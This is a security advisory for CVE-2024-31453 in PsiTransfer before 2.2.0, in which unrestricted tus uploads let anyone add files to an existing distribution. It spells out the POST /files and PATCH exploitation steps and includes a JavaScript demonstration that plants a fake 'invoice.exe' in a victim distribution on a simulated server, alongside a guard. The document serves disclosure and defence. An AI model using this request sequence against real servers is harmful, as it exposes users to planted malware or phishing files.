PT-2024-24087 · Unknown · Psitransfer
Onelovegg1 · Published 2024-04-05 · Updated 2025-11-25 · CVE-2024-31453
CVSS v3.1: 6.5 (Medium)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Name of the Vulnerable Software and Affected Versions: PsiTransfer, versions prior to 2.2.0
Description: The issue arises from the absence of restrictions on the "POST /files" endpoint, the upload-creation endpoint of the tus resumable-upload protocol that PsiTransfer uses. Any user can create a new upload inside an existing file distribution simply by naming that distribution's id, so an attacker who knows the id can add arbitrary files to it. Users who open the distribution afterwards see the attacker's files alongside the legitimate ones and are exposed to malicious or phishing content. Exploitation takes three steps: create a file distribution (or otherwise obtain the id of the target distribution), send a POST request to "/files" with that id in the sid field of the Upload-Metadata header, and then send a PATCH request to the returned upload location to write arbitrary content.
Recommendations: For PsiTransfer versions prior to 2.2.0, update to version 2.2.0 or later, which resolves the issue. As a temporary workaround, restrict access to the "POST /files" endpoint to minimize the risk of exploitation, and avoid using the sid parameter in the Upload-Metadata header until the issue is resolved.
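The request sequence from the description, together with one form of the "restrict POST /files" workaround, as an added JavaScript example. This is not PsiTransfer's code and not the published PoC: the in-memory stand-in server, the sid value abc123def456, the file names and all function names are constructed for illustration, and the guard reproduces only one reading of the workaround (refusing tus creations that name an already-existing distribution), not the actual 2.2.0 fix.

```javascript
// Added example (not PsiTransfer's code): models the CVE-2024-31453 request
// sequence over the tus resumable-upload protocol. The "server" below is an
// in-memory stand-in and every id, name and byte string is constructed.

// tus 1.0 Upload-Metadata: comma-separated "key base64(value)" pairs.
function encodeUploadMetadata(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `${k} ${Buffer.from(String(v), 'utf8').toString('base64')}`)
    .join(',');
}

function decodeUploadMetadata(header) {
  const out = {};
  for (const pair of (header || '').split(',')) {
    const [k, b64] = pair.trim().split(' ');
    if (k) out[k] = b64 ? Buffer.from(b64, 'base64').toString('utf8') : '';
  }
  return out;
}

// Constructed stand-in for a vulnerable instance. `restrictExistingSid`
// turns on a guard that refuses a new tus creation whose sid names a
// distribution that already exists (assumed workaround, not the real fix).
function makeFakeServer({ restrictExistingSid = false } = {}) {
  const buckets = new Map(); // sid -> [{ name, bytes }]
  const uploads = new Map(); // upload id -> { sid, name, buf, length }
  let nextId = 1;
  function send(path, { method = 'GET', headers = {}, body } = {}) {
    if (method === 'POST' && path === '/files') {
      const meta = decodeUploadMetadata(headers['Upload-Metadata']);
      if (!meta.sid) return { status: 400 };
      if (restrictExistingSid && buckets.has(meta.sid)) return { status: 409 };
      const id = String(nextId++);
      uploads.set(id, { sid: meta.sid, name: meta.name || 'file',
                        buf: Buffer.alloc(0), length: Number(headers['Upload-Length']) });
      return { status: 201, headers: { Location: `/files/${id}` } };
    }
    const m = method === 'PATCH' && path.match(/^\/files\/(\d+)$/);
    if (m && uploads.has(m[1])) {
      const up = uploads.get(m[1]);
      if (Number(headers['Upload-Offset']) !== up.buf.length) return { status: 409 };
      up.buf = Buffer.concat([up.buf, body]);
      if (up.buf.length === up.length) { // upload complete: file joins the distribution
        if (!buckets.has(up.sid)) buckets.set(up.sid, []);
        buckets.get(up.sid).push({ name: up.name, bytes: up.buf });
      }
      return { status: 204, headers: { 'Upload-Offset': String(up.buf.length) } };
    }
    return { status: 404 };
  }
  return { send, buckets };
}

// The two-request exploit from the advisory: POST /files naming the target
// distribution's sid in Upload-Metadata, then PATCH the returned location.
function addFileToDistribution(send, sid, name, content) {
  const create = send('/files', {
    method: 'POST',
    headers: {
      'Tus-Resumable': '1.0.0',
      'Upload-Length': String(content.length),
      'Upload-Metadata': encodeUploadMetadata({ sid, name, type: 'application/octet-stream' }),
    },
  });
  if (create.status !== 201) return { ok: false, status: create.status };
  const patch = send(create.headers.Location, {
    method: 'PATCH',
    headers: { 'Tus-Resumable': '1.0.0', 'Upload-Offset': '0',
               'Content-Type': 'application/offset+octet-stream' },
    body: content,
  });
  return { ok: patch.status === 204, status: patch.status, location: create.headers.Location };
}

// Runs the exploit against a distribution that already holds one legitimate
// file; with the guard off the attacker's file is appended, with it on the
// creation is refused.
function demo(restrictExistingSid) {
  const server = makeFakeServer({ restrictExistingSid });
  const sid = 'abc123def456'; // assumed id of a victim's existing distribution
  server.buckets.set(sid, [{ name: 'report.pdf', bytes: Buffer.from('legit') }]);
  const result = addFileToDistribution(server.send, sid, 'invoice.exe', Buffer.from('MZ...'));
  return { result, files: server.buckets.get(sid).map(f => f.name) };
}

console.log('vulnerable:', JSON.stringify(demo(false).files));
console.log('guarded:   ', JSON.stringify(demo(true).files));
```

Whether refusing creations against an existing sid is acceptable in a real deployment depends on how the client creates distributions (a multi-file upload reuses one sid across several POST /files calls), so the guard is shown as a policy to adapt, not to copy.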

Exploit

Fix

Weakness Enumeration

Unrestricted File Upload

Related Identifiers

CVE-2024-31453
GHSA-XG8V-M2MH-45M6

Affected Products

Psitransfer